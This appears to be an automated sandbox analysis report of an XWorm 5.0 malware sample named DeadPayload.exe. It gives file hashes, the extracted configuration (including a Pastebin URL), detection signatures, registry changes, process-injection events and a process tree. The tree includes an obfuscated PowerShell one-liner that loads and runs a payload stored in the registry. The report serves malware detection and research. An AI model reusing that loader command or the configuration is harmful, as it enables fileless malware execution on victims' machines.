Analysis
-
max time kernel
150s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
31/10/2024, 19:06
Static task
static1
Behavioral task
behavioral1
Sample
DeadPayload.exe
Resource
win7-20240708-en
General
-
Target
DeadPayload.exe
-
Size
500KB
-
MD5
4dbebfa079ea4b45eb94e2843180c56b
-
SHA1
820487493a6845752041ca9e0f714025c9eda4bc
-
SHA256
a17456d92d96f3fa579828f04e0530bf650eb92baf68bc414f101f6656c01cda
-
SHA512
b347ac5f39440fad010c8c8e715fb293967ae08b43cf246ea09b328b00a4f35ea6a251e432ad6c26901fb5db8936c57f370df321ae86cb8180e5aee2de57574b
-
SSDEEP
12288:N3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdN:dkGTy
Malware Config
Extracted
xworm
5.0
QgVg78qW15uIsQ4H
-
Install_directory
%Public%
-
install_file
ohh.exe
-
pastebin_url
https://pastebin.com/raw/J09JweeH
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016ce8-5.dat family_xworm behavioral1/memory/2256-8-0x0000000001360000-0x000000000136E000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2544 created 420 2544 powershell.EXE 5 -
Xworm family
-
Executes dropped EXE 2 IoCs
pid Process 2256 DeadMan.exe 2804 DeadRoot.exe -
pid Process 2544 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2544 set thread context of 2528 2544 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadRoot.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0335802c82bdb01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2544 powershell.EXE 2544 powershell.EXE 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe 2528 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2256 DeadMan.exe Token: SeDebugPrivilege 2544 powershell.EXE Token: SeDebugPrivilege 2544 powershell.EXE Token: SeDebugPrivilege 2528 dllhost.exe Token: SeAuditPrivilege 828 svchost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 1504 wrote to memory of 2256 1504 DeadPayload.exe 31 PID 1504 wrote to memory of 2256 1504 DeadPayload.exe 31 PID 1504 wrote to memory of 2256 1504 DeadPayload.exe 31 PID 1504 wrote to memory of 2804 1504 DeadPayload.exe 32 PID 1504 wrote to memory of 2804 1504 DeadPayload.exe 32 PID 1504 wrote to memory of 2804 1504 DeadPayload.exe 32 PID 1504 wrote to memory of 2804 1504 DeadPayload.exe 32 PID 2680 wrote to memory of 2544 2680 taskeng.exe 34 PID 2680 wrote to memory of 2544 2680 taskeng.exe 34 PID 2680 wrote to memory of 2544 2680 taskeng.exe 34 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2544 wrote to memory of 2528 2544 powershell.EXE 36 PID 2528 wrote to memory of 420 2528 dllhost.exe 5 PID 2528 wrote to memory of 476 2528 dllhost.exe 6 PID 2528 wrote to memory of 484 2528 dllhost.exe 7 PID 2528 wrote to memory of 492 2528 dllhost.exe 8 PID 2528 wrote to memory of 588 2528 dllhost.exe 9 PID 2528 wrote to memory of 668 2528 dllhost.exe 10 PID 2528 wrote to memory of 740 2528 dllhost.exe 11 PID 2528 wrote to memory of 800 2528 dllhost.exe 12 PID 2528 wrote to memory of 828 2528 dllhost.exe 13 PID 2528 wrote to memory of 952 2528 dllhost.exe 15 PID 2528 wrote to memory of 236 2528 dllhost.exe 16 PID 2528 wrote to memory of 1012 2528 dllhost.exe 17 PID 2528 wrote to memory of 900 2528 dllhost.exe 18 PID 2528 wrote to memory of 1104 2528 dllhost.exe 19 PID 2528 wrote to memory of 1160 2528 dllhost.exe 20 PID 2528 wrote to memory of 1184 2528 dllhost.exe 21 PID 2528 wrote to memory of 1228 2528 dllhost.exe 23 PID 2528 wrote to memory of 1304 2528 dllhost.exe 24 PID 2528 wrote to memory of 1520 2528 dllhost.exe 25 PID 2528 wrote to memory of 2056 2528 dllhost.exe 26 PID 2528 wrote to memory of 1912 2528 dllhost.exe 27 PID 2528 wrote to memory of 2680 2528 dllhost.exe 33
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f2725931-8f34-4b5a-b386-db1e22f330be}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:588
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1304
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1520
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:668
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:740
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:800
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\system32\taskeng.exetaskeng.exe {140D117A-7064-4CC7-8B52-015136580652} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('D'+[Char](101)+''+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:952
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:236
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1012
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:900
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1104
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1228
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2056
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1912
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:484
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:492
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"C:\Users\Admin\AppData\Local\Temp\DeadPayload.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Public\DeadMan.exe"C:\Users\Public\DeadMan.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Users\Public\DeadRoot.exe"C:\Users\Public\DeadRoot.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2804
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD598b90748bb1bac3ca2333277b73923f8
SHA19fc96e64ebf90e98030cb701674b67f9e2c3cc0a
SHA256808ac699a3084328563971bc10c6d3b2c4c95b916a454c2a6f645173e8536da3
SHA512aac113000f209bd307b0c8410574051d5e63a196a2af103694b66edaec8eebf10d4952cdf5ed2172fa047b439bef27b87efea984cddc906a3c1a33a143768a34
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4